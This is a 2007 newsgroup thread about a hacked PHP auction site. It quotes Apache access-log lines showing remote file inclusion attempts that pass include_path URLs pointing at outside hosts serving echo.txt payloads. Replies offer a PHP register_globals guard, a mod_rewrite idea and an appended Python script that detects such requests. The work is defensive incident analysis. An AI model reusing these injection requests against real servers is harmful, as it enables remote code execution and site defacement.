 Posted by Charles Crume on 10/17/07 23:22 
Hi Jean; 
 
This has to be added to every script, correct? (If so, it would be too much  
work and I would be better off to purchase newer auction software.) 
 
I am also looking at using mod_rewrite in Apache to redirect any request with 
"include_path" in it to a null page. Does anyone have thoughts on this 
approach? 
 
TIA. 
 
Charles... 
 
 
 
 
"Jean Gaudreau" <jean.gaudreau@gmail.com> wrote in message  
news:1192541328.007138.293000@i13g2000prf.googlegroups.com... 
> On Oct 14, 9:56 pm, "Charles Crume" 
> <NOccsS...@charlescrumesoftware.com> wrote: 
>> Hello Everyone; 
>> 
>> My site was hacked the other day -- someone was able to rename my 
>> index.shtml file and put their own index.html file on my server. Not sure 
>> how it was done, but looking through the log file, I found lots and lots 
>> of entries where an "include_path" parameter was included in the URL of 
>> the PHP page, as shown below: 
>> 
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET 
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? 
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65" 
>> 
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET 
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? 
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65" 
>> 
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET 
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? 
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET 
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? 
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET 
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1" 
>> 404 310 "-" "libwww-perl/5.808" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET 
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? 
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET 
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1" 
>> 404 310 "-" "libwww-perl/5.808" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET 
>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? 
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET 
>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? 
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808" 
>> 
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET 
>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? 
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808" 
>> 
>> I know how "include_path" works when *in* the PHP file, but I'm not sure 
>> what the effect of including it in the URL is. A number of entries show a 
>> code 404 as the culprits are obviously phishing for pages, but requests with 
>> return code 200 are showing a large number of bytes transferred -- far 
>> larger than the PHP page itself. 
>> 
>> Can someone explain what adding "include_path" to a URL does? 
>> 
>> Is there something I need to check on my server of how I've got Apache 
>> configured? 
>> 
>> TIA. 
>> 
>> Charles... 
> 
> Hi, 
> 
> I've also been the target of a hacker, with the same attack. 
> 
> Add this to your script: 
> 
> ===== 
> 
> $php_self = $_SERVER['PHP_SELF']; 
> 
> // Only guard the include file the attackers were requesting directly, and 
> // only when register_globals is on (that is what turns the URL parameter 
> // into a global $include_path). 
> if (($php_self == "/auction/includes/settings.inc.php") && 
>     (ini_get('register_globals'))) { 
>     $rg = array_keys($_REQUEST); 
>     foreach ($rg as $var) 
>     { 
>         // A global whose value exactly matches the request parameter was 
>         // injected by register_globals: drop it and stop. 
>         if (isset($$var) && $_REQUEST[$var] === $$var) 
>         { 
>             unset($$var); 
>             exit; 
>         } 
>     } 
> } 
> 
> ======= 
> 
> This will check if they are running the file; if register_globals is 
> enabled, it catches the parameters and unsets them, then halts the script. 
> 
> So far it is working. 
> 
> Jean 
>
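As an added example (not code from either poster), a defender's log-triage script for the pattern discussed in this thread: it parses Apache combined-format lines like the ones quoted above, flags any query parameter named include_path or pointing at a remote URL, and notes which attempts got a 200 (the ones that likely fetched and ran the remote file). The 10.0.0.5 line is a constructed benign request.

```python
import re
from urllib.parse import parse_qs
# Sample input: three lines from the access-log excerpt quoted above, plus one
# constructed benign request (10.0.0.5) to show what is not flagged.
SAMPLE_LOG = """\
69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt? HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt? HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
10.0.0.5 - - [11/Oct/2007:16:00:00 -0400] "GET /auction/index.php?id=268 HTTP/1.1" 200 78400 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: client, timestamp, request line, status, bytes, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"')
# A value naming another server: what include() would fetch if the parameter became $include_path.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://([^/?#]+)", re.I)

def find_rfi(line):
    """One finding per suspicious query parameter in a single log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m["target"].partition("?")
    status = int(m["status"])
    size = 0 if m["bytes"] == "-" else int(m["bytes"])
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            remote = REMOTE_RE.match(value)
            # Flag the include_path override seen in the thread, and any remote URL.
            if name.lower() == "include_path" or remote:
                findings.append({
                    "ip": m["ip"], "path": path, "param": name,
                    "remote_host": remote.group(1) if remote else None,
                    "status": status, "bytes": size,
                    # A 200 with a remote URL suggests the server fetched and ran it.
                    "likely_executed": status == 200 and remote is not None})
    return findings

def summarize(log_text):
    """Per source IP: attempts, probable successes, and the hosts serving payloads."""
    by_ip = {}
    for line in log_text.splitlines():
        for h in find_rfi(line):
            s = by_ip.setdefault(h["ip"], {"attempts": 0, "executed": 0, "hosts": set()})
            s["attempts"] += 1
            s["executed"] += int(h["likely_executed"])
            if h["remote_host"]:
                s["hosts"].add(h["remote_host"])
    return by_ip
```

The hosts in the summary are the ones to block at the firewall and to report; the "executed" count tells you which includes actually need to be cleaned up and audited.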